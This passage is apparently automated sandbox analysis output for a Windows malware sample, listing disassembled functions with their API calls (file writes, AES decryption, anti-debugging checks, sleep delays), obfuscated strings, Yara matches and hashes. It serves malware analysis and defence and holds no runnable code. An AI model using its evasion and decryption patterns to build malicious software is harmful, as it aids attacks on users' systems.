                                                  • Part of subcall function 04B62457: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 04B6248D
                                                  • Part of subcall function 04B62457: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 04B624AE
                                                  • Part of subcall function 04B62457: CloseHandle.KERNEL32(00000000), ref: 04B624B5
                                                • __Init_thread_footer.LIBCMT ref: 04B64469
                                                  • Part of subcall function 04B69EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B69EF7
                                                  • Part of subcall function 04B69EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B69F34
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Init_thread_footer$CriticalSection$File$CreateEnterLeavePathSleepTime$ByteCharCloseFolderHandleInitializeInstanceMultiSystemTempUnothrow_t@std@@@WideWrite__ehfuncinfo$??2@
                                                • String ID: KDOX$]DFE$^OX*$viFO
                                                • API String ID: 529012138-4238671514
                                                • Opcode ID: d653516d6fcac4cfb1a3aecc6086a08e4b36a7bab3ac3c77805d5c8949ef4ee8
                                                • Instruction ID: 3315045fbb3a34e950b3e62640445f3b3e2ca1b80243ae3fec44e16f3e4b457c
                                                • Opcode Fuzzy Hash: d653516d6fcac4cfb1a3aecc6086a08e4b36a7bab3ac3c77805d5c8949ef4ee8
                                                • Instruction Fuzzy Hash: 6FF213B0E042589FEB24CF24DC48BADBBB1EF45304F1441E8D50A6B291DB79BA85CF59
                                                Function 04D03120 Relevance: 22.8, APIs: 8, Strings: 4, Instructions: 1839COMMON
                                                Download Yara Rule
                                                APIs
                                                • __Init_thread_footer.LIBCMT ref: 04D03426
                                                • __Init_thread_footer.LIBCMT ref: 04D03602
                                                • __Init_thread_footer.LIBCMT ref: 04D038F7
                                                • __Init_thread_footer.LIBCMT ref: 04D03ABD
                                                • __Init_thread_footer.LIBCMT ref: 04D044BD
                                                • __Init_thread_footer.LIBCMT ref: 04D047CB
                                                • __Init_thread_footer.LIBCMT ref: 04D03D55
                                                  • Part of subcall function 04D0FBE2: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04D0FC16
                                                • __Init_thread_footer.LIBCMT ref: 04D03FBE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.2398971584.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                                Similarity
                                                • API ID: Init_thread_footer$Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: KDOX$]DFE$^OX*$viFO
                                                • API String ID: 829385169-4238671514
                                                • Opcode ID: d653516d6fcac4cfb1a3aecc6086a08e4b36a7bab3ac3c77805d5c8949ef4ee8
                                                • Instruction ID: 88129635c1eb5b3cbac3c2365f4df0ed5b7c99a00c2ac15b0ae6a711a23d9b97
                                                • Opcode Fuzzy Hash: d653516d6fcac4cfb1a3aecc6086a08e4b36a7bab3ac3c77805d5c8949ef4ee8
                                                • Instruction Fuzzy Hash: 89F2E1B0E042189BEB24DF24DC58BADBBB1EF05304F5482D8E5096B2D1DB74BA85CF65
                                                Function 04B63817 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 225encryptionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,0042C014), ref: 04B63897
                                                • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 04B638BB
                                                • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 04B63925
                                                • GetLastError.KERNEL32 ref: 04B6392F
                                                • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 04B63957
                                                • GetLastError.KERNEL32 ref: 04B63961
                                                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 04B63971
                                                • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 04B63A33
                                                • CryptDestroyKey.ADVAPI32(?), ref: 04B63AA5
                                                Strings
                                                • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 04B63873
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
                                                • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                                • API String ID: 3761881897-63410773
                                                • Opcode ID: 40fbdad3a39ca36db9715c34553cb7c87d5092a534739f652b7b7891191c3091
                                                • Instruction ID: 8ed36b872722dda26fb4396a46eea9bdd84ad28f16be1764a5daea6e10f86296
                                                • Opcode Fuzzy Hash: 40fbdad3a39ca36db9715c34553cb7c87d5092a534739f652b7b7891191c3091
                                                • Instruction Fuzzy Hash: 1F816F71A002189FEF248F24CC45B9EBBB5EF49300F1481E9E94EE7291DB35AE859F51
                                                Function 04B651B7 Relevance: 12.9, APIs: 5, Strings: 2, Instructions: 621sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 04B70A49: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,04B65CE6,00000000,0042C014), ref: 04B70A5E
                                                  • Part of subcall function 04B70A49: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04B70A7D
                                                  • Part of subcall function 04B69EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B69EF7
                                                  • Part of subcall function 04B69EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B69F34
                                                • __Init_thread_footer.LIBCMT ref: 04B65324
                                                • Sleep.KERNEL32(00000BB8,00000000,?,04B66CE8,0041D8A0,0042DB20,0042DB21), ref: 04B6553C
                                                • __Init_thread_footer.LIBCMT ref: 04B65632
                                                • Sleep.KERNEL32(000007D0), ref: 04B6599C
                                                • Sleep.KERNEL32(000007D0), ref: 04B659B6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep$CriticalInit_thread_footerSectionTime$EnterFileLeaveSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: DFEK$updateSW
                                                • API String ID: 3554146954-1114742100
                                                • Opcode ID: 77110f7e8cc78f45bd0e6b43112bb3db69cfffe81fb6a3c2c0fb0262c7cc4dea
                                                • Instruction ID: 5d56a9a702dad2434d98fe4f27fd2356b6d8580b0a4dff25f0eebe2d2d20b32b
                                                • Opcode Fuzzy Hash: 77110f7e8cc78f45bd0e6b43112bb3db69cfffe81fb6a3c2c0fb0262c7cc4dea
                                                • Instruction Fuzzy Hash: C93232B1E002549BEF28DF24DC887ADBBB1EF45304F1442E9D40A6B291DB78AE85CF55
                                                Function 00999A97 Relevance: 10.4, Strings: 7, Instructions: 1675COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877232140.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: )A~|$6o*4$L-s$_-w2$e:Go$|+}{$|+}{
                                                • API String ID: 0-2970922531
                                                • Opcode ID: ed93b3cbe23dfa3c6fca998295a8051e675e96b7954e6a787f503204a91d1039
                                                • Instruction ID: ff1f0b22cda258ccd4cb6437ca3ea28d996e9bd7fd1642b4c5287d89458e359f
                                                • Opcode Fuzzy Hash: ed93b3cbe23dfa3c6fca998295a8051e675e96b7954e6a787f503204a91d1039
                                                • Instruction Fuzzy Hash: 2DB208F3A0C204AFE304AE2DEC8567ABBE5EFD4360F16863DE6C5C3744E93558058696
                                                Function 04D04350 Relevance: 10.4, APIs: 3, Strings: 2, Instructions: 1645COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 04D0FBE2: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04D0FC16
                                                • __Init_thread_footer.LIBCMT ref: 04D044BD
                                                • __Init_thread_footer.LIBCMT ref: 04D047CB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.2398971584.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                                Similarity
                                                • API ID: Init_thread_footer$Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: DFEK$U%
                                                • API String ID: 829385169-3435397596
                                                • Opcode ID: 41cbdf90dec37eb52b954d10541310d96c062ecf6e52845e935639f857fb7cc0
                                                • Instruction ID: 01384debf471ce94e14142a97189ff0586a5139a176f32076495f655a9d5bb9b
                                                • Opcode Fuzzy Hash: 41cbdf90dec37eb52b954d10541310d96c062ecf6e52845e935639f857fb7cc0
                                                • Instruction Fuzzy Hash: 78D2F271E002149BEB15EF24DC54BEDBBB5EF40308F5481A9E8096B2D1DB74BA85CFA1
                                                Function 0041A306 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1473COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: __floor_pentium4
                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                • API String ID: 4168288129-2761157908
                                                • Opcode ID: e4a2af43c5bc17daceace0d9627c377d7fa11afa99750231fbf68f24f9a3cb98
                                                • Instruction ID: 71a107362d346717e648338213b5422f70619b5b18563a803cf0c70334ea4234
                                                • Opcode Fuzzy Hash: e4a2af43c5bc17daceace0d9627c377d7fa11afa99750231fbf68f24f9a3cb98
                                                • Instruction Fuzzy Hash: 78D22771E092288FDB65CE28DD407EAB7B5EB44314F1441EAD44DE7240E778AEC58F86
                                                Function 0099652B Relevance: 7.9, Strings: 5, Instructions: 1661COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877232140.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8EHs$:ks-$XXzN$`R-?${~wk
                                                • API String ID: 0-1416664287
                                                • Opcode ID: d2228863ebcee3a975ae74bb3f7dd21cf91f2e7a173475798d627c477342c244
                                                • Instruction ID: 3076d454c07eaa299a94a408148eb2cbfeca5c950a4d25870204de444f3352b9
                                                • Opcode Fuzzy Hash: d2228863ebcee3a975ae74bb3f7dd21cf91f2e7a173475798d627c477342c244
                                                • Instruction Fuzzy Hash: DEB22AF360C2049FE314AE2DEC8567AFBE5EF98320F16463DEAC4D3744EA3558058696
                                                Function 0040CDA3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,(@), ref: 0040CE9B
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,(@), ref: 0040CEA5
                                                • UnhandledExceptionFilter.KERNEL32(004024E3,?,?,?,?,?,(@), ref: 0040CEB2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                • String ID: (@
                                                • API String ID: 3906539128-3675327911
                                                • Opcode ID: 699cb89c4481d733bc24bc723ff59a4702c04dd7a22af15121b47e74e86c8d00
                                                • Instruction ID: 588a31918c4d7a6a9ba75f52031696ab4f5dbddd8307c033202189b188a5c7dc
                                                • Opcode Fuzzy Hash: 699cb89c4481d733bc24bc723ff59a4702c04dd7a22af15121b47e74e86c8d00
                                                • Instruction Fuzzy Hash: 5E31C475911228ABCB21DF65D8897CDBBB4AF08310F5081EAE40CA7291E7749F858F48
                                                Function 0098FACE Relevance: 6.6, Strings: 4, Instructions: 1624COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877232140.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: =t?$bsV{$wfE~$d>V
                                                • API String ID: 0-3435156416
                                                • Opcode ID: 444320d33d52adc51038a4c33d04313b936581c647191ecdf9f294d6f6df07ef
                                                • Instruction ID: 54623765bc02f3ba1a3490c70df38e05023355b644e346c6001e0b2d33ecffa0
                                                • Opcode Fuzzy Hash: 444320d33d52adc51038a4c33d04313b936581c647191ecdf9f294d6f6df07ef
                                                • Instruction Fuzzy Hash: 00B2F7F36082009FE314AE2DEC8567AF7EAEFD4720F1A493DE6C4C7744EA3558058696
                                                Function 00991667 Relevance: 6.5, Strings: 4, Instructions: 1505COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877232140.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: /F!~$<kN$j-2$qYy
                                                • API String ID: 0-1529775823
                                                • Opcode ID: 1cd8d2f1be65132e940a329f114bf40fe38418de8f08dc5bc5670d266ebe5a53
                                                • Instruction ID: 708029d9ebb47d7aa50816a774c186fa7043e1aca736bcedd4e10b5b0aafc76f
                                                • Opcode Fuzzy Hash: 1cd8d2f1be65132e940a329f114bf40fe38418de8f08dc5bc5670d266ebe5a53
                                                • Instruction Fuzzy Hash: 53A2F4F360C2049FE3046E2DEC8577ABBE9EB94320F1A493DEAC5C3744EA7558058697
                                                Function 00410900 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 257df63f9c0a8af9516efd39e7f9a4a8ebb064806e5099792f7b0849a0375d65
                                                • Instruction ID: 1698085c936ca5c6c6a57ee88efec3ce2b030c017204745a192f91a5fd5d0df0
                                                • Opcode Fuzzy Hash: 257df63f9c0a8af9516efd39e7f9a4a8ebb064806e5099792f7b0849a0375d65
                                                • Instruction Fuzzy Hash: 8A025C71E002199BDF14CFA9D9806EEBBF1FF48314F24826AE919E7341D775A9818B84
                                                Function 04D0FD00 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.2398971584.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 257df63f9c0a8af9516efd39e7f9a4a8ebb064806e5099792f7b0849a0375d65
                                                • Instruction ID: 6c2d7a8c146462ba5a324ea9cfa0bf9606b88200bf4d53bcd6c6f7975e9f1e9e
                                                • Opcode Fuzzy Hash: 257df63f9c0a8af9516efd39e7f9a4a8ebb064806e5099792f7b0849a0375d65
                                                • Instruction Fuzzy Hash: 70024E71E00219ABDB15DFA8D8807AEBBF1FF48314F248269D919EB391D731A945CB90
                                                Function 04B70B67 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 257df63f9c0a8af9516efd39e7f9a4a8ebb064806e5099792f7b0849a0375d65
                                                • Instruction ID: ea05933711f035f349ee2608478a8b5ca9dd532ccce191208800c4f7af44965c
                                                • Opcode Fuzzy Hash: 257df63f9c0a8af9516efd39e7f9a4a8ebb064806e5099792f7b0849a0375d65
                                                • Instruction Fuzzy Hash: 6A022E71E012199FDF14DFA8C9806ADFBB5FF48314F2486AAD929EB340D731A941CB90
                                                Function 0099B814 Relevance: 6.4, Strings: 4, Instructions: 1401COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877232140.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: R/V$vig$wD_O$|_
                                                • API String ID: 0-900146328
                                                • Opcode ID: cd72ef09501c6eeb53dcf2234f18fac89825d24475af8b6a57457f32d11beaa2
                                                • Instruction ID: 79f455b5f8fd2092fce05db49e5af1c5e4547c901becc7e81fe4fc81213bd969
                                                • Opcode Fuzzy Hash: cd72ef09501c6eeb53dcf2234f18fac89825d24475af8b6a57457f32d11beaa2
                                                • Instruction Fuzzy Hash: A792E6F390C2009FE704AE29EC8576AB7E9EF94720F16893DEAC4D3744E63598058797
                                                Function 0040A54A Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                Download Yara Rule
                                                APIs
                                                • IsProcessorFeaturePresent.KERNEL32(00000017,12041A13), ref: 0040A556
                                                • IsDebuggerPresent.KERNEL32 ref: 0040A622
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040A642
                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 0040A64C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                • String ID:
                                                • API String ID: 254469556-0
                                                • Opcode ID: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                                                • Instruction ID: 8b01d550a0a2fff4667565f177a0bd7aa15c2cc699040a0714bae659939ad5a8
                                                • Opcode Fuzzy Hash: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                                                • Instruction Fuzzy Hash: 40311A75D0531CDBDB10DFA5D9897CDBBB8BF08304F1080AAE409A7290EB759A858F49
                                                Function 10002FDA Relevance: 6.1, APIs: 4, Instructions: 73COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 10002FE6
                                                • IsDebuggerPresent.KERNEL32 ref: 100030B2
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100030D2
                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 100030DC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                • String ID:
                                                • API String ID: 254469556-0
                                                • Opcode ID: fd06b871e9cf82683454e3fbfac267bd1ef2951c7b429272aa340f07bdb4f9c2
                                                • Instruction ID: 336d1356b37294b5c1fe5cc3e7a5e53ac0bdfc53d52c9a9f50db52ddd632742b
                                                • Opcode Fuzzy Hash: fd06b871e9cf82683454e3fbfac267bd1ef2951c7b429272aa340f07bdb4f9c2
                                                • Instruction Fuzzy Hash: B6312B75D45269DBEB21DF64C989BCDBBF8EF08340F1081AAE40DA7250EB719A85CF04
                                                Function 04B6A7B1 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                Download Yara Rule
                                                APIs
                                                • IsProcessorFeaturePresent.KERNEL32(00000017,12041A13), ref: 04B6A7BD
                                                • IsDebuggerPresent.KERNEL32 ref: 04B6A889
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 04B6A8A9
                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 04B6A8B3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                • String ID:
                                                • API String ID: 254469556-0
                                                • Opcode ID: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                                                • Instruction ID: 68b30883e0295d92b04eec212c1a4333c691322c00410dcf1057b2c5153111d6
                                                • Opcode Fuzzy Hash: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                                                • Instruction Fuzzy Hash: 0931F975D05219DBDF10DFA4D9897CCBBB8BF08304F1041EAE50DAB290EB75AA858F45
                                                Function 04D022C0 Relevance: 5.5, Strings: 4, Instructions: 454COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.2398971584.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0.@$P.@$p.@$p.@P.@0.@
                                                • API String ID: 0-3587633984
                                                • Opcode ID: b422344de76828a5e8cbae21da2638b275dc5e39bbf3ab9b9d7bd40fd995c566
                                                • Instruction ID: fbb2ff2264b49390f5b26b2455b6abd2fd81030c5558e074f1e74025330fed94
                                                • Opcode Fuzzy Hash: b422344de76828a5e8cbae21da2638b275dc5e39bbf3ab9b9d7bd40fd995c566
                                                • Instruction Fuzzy Hash: 23F1AD71B01215ABDB14CF68DC89BA9B7A4FF48304F5481A9E909EB6C1E771FC11CBA4
                                                Function 0099D02F Relevance: 5.3, Strings: 3, Instructions: 1587COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877232140.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: <Zu$gxy${yio
                                                • API String ID: 0-3485204274
                                                • Opcode ID: 4bc9d9cb1814ba00df3f5fd4510851c1f51b0f4eb62cb943445642a9ad10f146
                                                • Instruction ID: 181f22d0c862ced53cb952aa9391ab3ec9e60782ac33aab2bcc0353e2b978b99
                                                • Opcode Fuzzy Hash: 4bc9d9cb1814ba00df3f5fd4510851c1f51b0f4eb62cb943445642a9ad10f146
                                                • Instruction Fuzzy Hash: CBB2E6B360C2009FE704AE2DEC85A7ABBE9EF94720F16493DE6C5C3744EA7558018697
                                                Function 100056A0 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 10005798
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100057A2
                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100057AF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                • String ID:
                                                • API String ID: 3906539128-0
                                                • Opcode ID: ce89a4acebe00847e0bf7db2b2a5c1550e22667e6ae7b5dc377587a900902601
                                                • Instruction ID: 5682311db8f2ea5b7fb0b10b77ab1de1cec722dcfd082a676ba882e0b3775376
                                                • Opcode Fuzzy Hash: ce89a4acebe00847e0bf7db2b2a5c1550e22667e6ae7b5dc377587a900902601
                                                • Instruction Fuzzy Hash: 4B31D3749012299BDB62DF24DD89B8DBBB8EF08750F5081EAE41CA7250EB709F858F44
                                                Function 04B6D00A Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,04B62A70), ref: 04B6D102
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,04B62A70), ref: 04B6D10C
                                                • UnhandledExceptionFilter.KERNEL32(04B6274A,?,?,?,?,?,04B62A70), ref: 04B6D119
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                • String ID:
                                                • API String ID: 3906539128-0
                                                • Opcode ID: eab9de89e4f223b0e8801f8ff3c4edb53ba30b9f948264c96fa02635900acdf3
                                                • Instruction ID: b24c568c01ca5937dd400ca93783a8edaa60ca36c7b802b6ac53bb607cf23ad8
                                                • Opcode Fuzzy Hash: eab9de89e4f223b0e8801f8ff3c4edb53ba30b9f948264c96fa02635900acdf3
                                                • Instruction Fuzzy Hash: FA31A27490122CABCB21DF64DC887DDBBB8BF18310F5041EAE51DA7290E774AB858F45
                                                Function 0098CF3C Relevance: 4.6, Strings: 3, Instructions: 803COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877232140.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: &no^$E_9$Fnhh
                                                • API String ID: 0-1962810965
                                                • Opcode ID: 1dc4588196ba730c0583884aa6ac5b923e99f1c7a84551edfad0b6bb29d75e8f
                                                • Instruction ID: a8abeae1184c1ae4ef20f2c643c00a160e93bd05ff63eaf2b294f9a35c77a07e
                                                • Opcode Fuzzy Hash: 1dc4588196ba730c0583884aa6ac5b923e99f1c7a84551edfad0b6bb29d75e8f
                                                • Instruction Fuzzy Hash: 864217F360C2009FE314AE29DC8567AFBD5EF94760F1A8A3DE6C4C7744EA3598048697
                                                Function 10005F25 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentProcess.KERNEL32(?,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F47
                                                • TerminateProcess.KERNEL32(00000000,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F4E
                                                • ExitProcess.KERNEL32 ref: 10005F60
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
